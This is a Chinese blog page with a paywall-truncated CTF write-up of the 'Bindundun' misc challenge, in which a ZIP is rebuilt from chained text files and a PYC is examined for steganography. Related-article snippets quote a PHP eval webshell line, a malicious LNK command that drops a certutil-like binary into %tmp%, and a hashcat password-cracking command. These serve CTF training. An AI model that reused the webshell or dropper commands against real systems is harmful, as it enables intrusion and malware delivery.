2022DASCTF Apr X FATE 防疫挑战赛——【Misc】Bindundun

原创

已于 2022-04-25 09:17:57 修改 · 461 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

于 2022-04-24 16:29:04 首次发布

本文介绍了一次信息安全挑战的过程，涉及到文件解析、数据重组、压缩包恢复和隐写术。通过识别十六进制数据模式，作者重建了一个ZIP文件，并从中解压出隐藏的PYC文件。进一步使用特定工具进行隐写分析，提取出隐藏在PYC文件中的信息，最终解密得到Flag。此过程展示了信息安全领域中文件隐藏与提取技术的应用。

Bindundun

下载附件，解压发现是10万多个txt，找到一个start.txt，打开内容如下：

101000001001011 =>The txt you should view is m9312r95cr.txt

其他文件也是这种格式，发现前部分得数据是15位，左边补零转16进制的话就是0x504B，看到这里应该能想到是压缩包了，写了个脚本逐个读取文件，将数据拼接并写入文件。

import re

path = 'D:\\BinDunDun\\'

regex_next = "is (.*?\\.txt)"
regex_data = "(.*?) =>"
next_file = 'start.txt'
final_data = ''</

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2ha0yuk7on.

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

2022DASCTF Apr X FATE 防疫挑战赛——【Misc】熟悉的猫

04-27

1762

熟悉的猫下载文件，补上zip后缀名，解压得到两个文件： flag.zip有密码保护 len5.kdbx文件经过搜索，可以使用keepass打开。打开时发现需要密码。根据文件名，猜测密码为5位字符，则开始爆破。首先使用John The Ripper工具转换一下John支持的格式。然后使用hashcat爆破hash值得到密码。 hashcat -m 13400 keepass.txt -a 0 password.txt --force # m：破解的hash类型，hashcat -h 何查看类

2022DASCTF Apr X FATE 防疫挑战赛 WriteUP

Huamang的博客

04-25

2628

文章目录MiscSimpleFlowWebwarmup-phpsoeasy_php Misc SimpleFlow 看流量大概是上传了一个后门，但是会对payload加密，这里发现有flag.txt被打包后面的包里面发现flag.zip 但是打开需要密码，那么我们就要回去压缩的地方，看看给的什么密码，所以我们就得解开这个流量 @eval(@base64_decode($_POST['m8f8d9db647ecd'])); &e57fb9c067c677=o3 &g479cf6f058c

参与评论您还未登录，请先登录后发表或查看评论

DASCTF_Misc_holmes

Le1a's Blog

05-29

432

下载附件得到一张福尔摩斯的图片上面有跳舞小人加密，通过对照表解密得到YOUAREHOLMES 用Foremost分离得到一个压缩包，用刚刚得到的YOUAREHOLMES作为密码解压得到一个python文件，打开得到一个程序 flag="flag{********************************}" encflag=[] for i in range(len(flag)): encflag.append((ord(flag[i])+i)%128) print(encflag) '

2022DASCTF Apr X FATE 防疫挑战赛复现

m0_62129839的博客

05-22

573

misc 第二题： wireshark打开直接搜字符串flag，发现4个字段含有flag，其中一个发现是zip文件，想把它提取出来，将他数据导入一个新的zip文件，打开在50段找到密码加密字段，找好格式用base64解码，得到密码，解开得到flagPaSsZiPWorD 第三题熟悉的猫：被卡住了，下载好了keepass，可是解码工具却一直下不好，下好了也用不上。暂时搁置。 ...

2022DASCTF Apr X FATE 防疫挑战赛 Writeup

末初 · mochu7

04-25

2908

文章目录SimpleFlow熟悉的猫冰墩墩废物选手的misc做题记录 SimpleFlow 首先tcp.stream eq 50中分析传入的执行命令的变量是$s，也就是参数substr($_POST["g479cf6f058cf8"],2) 找到对应的参数，然后去掉前面两位字符解码即可 cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E] 得到压缩包密码：PaSsZi

[dasctf]misc2

amber_o0k的博客

09-02

167

提取出来base解码即可。

[MISC]2022DASCTF Apr X FATE 防疫挑战赛

RookieMOR的博客

05-06

1689

1.SimpleFlow; 2.熟悉的猫; 3.冰墩墩； 1.SimpleFlow：下载得到SimpleFlow的压缩包，解压得到SimpleFlow.pcapng，流量分析题目。查找 flag. ，可以知道一共有四个flag.txt文件，一个flag.zip文件。用kali的foremost指令可以分离出flag.zip文件，发现flag.zip需要密码。再追踪每个flag.txt。发现蚁剑流量，一个一个base64解码，在其中一个txt文件中得到： Y2QgIi9Vc2Vy.

2022DASCTF Apr X FATE 防疫挑战赛个人Writeup

04-24

970

这次下午有事，上午做了两道就溜了，简单记录一下。 Crypto easy_real 读题目代码： import random import hashlib flag = 'xxxxxxxxxxxxxxxxxxxx' key = random.randint(1,10) for i in range(len(flag)): crypto += chr(ord(flag[i])^key) m = crypto的ascii十六进制 e = random.randint(1,100) print(hashlib

2022DASCTF Apr X FATE 防疫挑战赛WP

LaniakeaHarry的博客

04-24

3891

NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.

[HWS&DasCTF]misc

Huamang的博客

01-28

1291

babypdf 附件是一个快捷方式，但是打开是可以成功的看到pdf的，这就肯定是从外面加载进来的看一下目标 %SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr

[dasctf]misc04

amber_o0k的博客

09-02

446

flag.zip需要解压密码，在图片中发现一串密文。一串乱码，尝试进行字符编码爆破。获取到密码：简单的编码。第三届红明谷杯CTF-【MISC】-阿尼亚_keepb1ue的博客-优快云客。密码为拼音（jiandanbianma），但是tmd你少打了个的啊。与他不说一模一样吧也差不多。里面编码随波逐流可破。

2021DASCTF Misc red_vs_blue

qq_51271165的博客

08-06

703

（第一次接触到需要nc连接的杂项题）没有nc的需要先安装（Linux在终端输入apt install netcat）安装完成后，直接nc xxxxxx xxxx 输入r/b猜测红蓝队的胜利，连续猜对66次就可以得到flag 如果错了就要重新猜（答案顺序不变），但是90秒后会自动断开连接，重新连接后答案顺序会改变，所以要人力无法完成的，要用脚本在90秒内跑出来，脚本如下： from pwn import * #需要用到pwntools模块 context.l...

【DASCTF2023】Misc mp3

Makabakahaha的博客

02-02

1038

浅浅记录DASCTF初赛的一道misc题~

DASCTF7月misc--ez_forenisc

WXjzcccc的博客

07-27

972

取证大师解bitlocker（也可以先将vmdk转换为其他passware可以识别的格式，直接通过内存镜像解出一个解密的镜像）查看内容发现密文，看着像base64，但是base64可不需要密钥啊，那么就有可能是AES了。有密钥那就有密文，继续分析内存文件，扫描文件时发现一个文件thes3cret。passware解析内存镜像，得到用户名密码550f37c7748e。压缩包有密码，密码就是之前得到的用户密码，解压得到内容。观察发现没有大于8的数字，判断是8进制，转换一下输出。预览发现是压缩包，直接导出文件。.

DASCTF X GFCTF 2022十月 Misc

mumuzi的博客

10-24

4924

DASCTF X GFCTF 2022 10月

DASCTF 2025上半年赛|MISC全解

最新发布

zerorzeror的博客

06-23

2852

获得p值：519a73ca97a9e3ea，MD5后取前16位：d14d8ce94563e71a，后续AES解密的Key，题目要提交root的密码，通常在返回数据中。导出35MB的index.php，发现包含Base64编码，解码后是7z文件，解压缩得到secret.vmdk，RStudio加载，发现BitLocker加密。得到解压缩密码：infernityのpc，发现无法解压缩，盲猜是大小写的问题，生成所有大小写的密码字典。导出一堆文件，直接查看Request的汇总，最后出现了与flag有关的注入请求。

安恒四月月赛DASCTF-Misc Write Up

阿鱼的小世界

04-29

3190

参考资料 http://www.ga1axy.top/index.php/archives/28/ https://shimo.im/docs/WjVJd6pqy8dWxd6w/ Misc 6G还远吗（签到题）开始点击下载后发现文件接近3.45G，而且下载速度贼慢，上面显示下完需要7.8个小时不过我们比赛时间只有四个小时于是现将文件的部分下载下来载入010中可以看到flag 涉...

2022DASCTF MAY 出题人挑战赛 misc

mumuzi的博客

05-22

3207

MAYMISC

DASCTF Oct X 吉林工师-欢迎来到魔法世界-misc-魔法秘文(复现)

ookami6497的博客

11-09

507

下载得到一个无后缀名格式文件，结合名字推测这是一个zip格式文件，用010editor打开也能看出这是zip格式。添加后缀名 .zip,然后解压得到一个图片文件，有文件大小有7M多，应该藏了东西在里面放进kali中用binwalk指令看一下，可以看到最后有一个zip格式的文件用dd命令分离一下，其中if是输入文件，of是输出文件，skip是指定从第7758998个块开始复制，bs设置每次读写块的大小为1字节然后得到一个123.zip 里面一共有2个文件，一个flag..

安徽省首届网络安全挑战赛——CTF追日杯盛况

资源摘要信息:"首届安徽省‘追日杯’大学生网络安全挑战赛"是一场面向大学生的网络安全竞赛活动，该赛事聚焦于网络安全领域的实操技能，通过CTF（Capture The Flag，夺旗赛）的方式，要求参赛者解决各种与网络安全...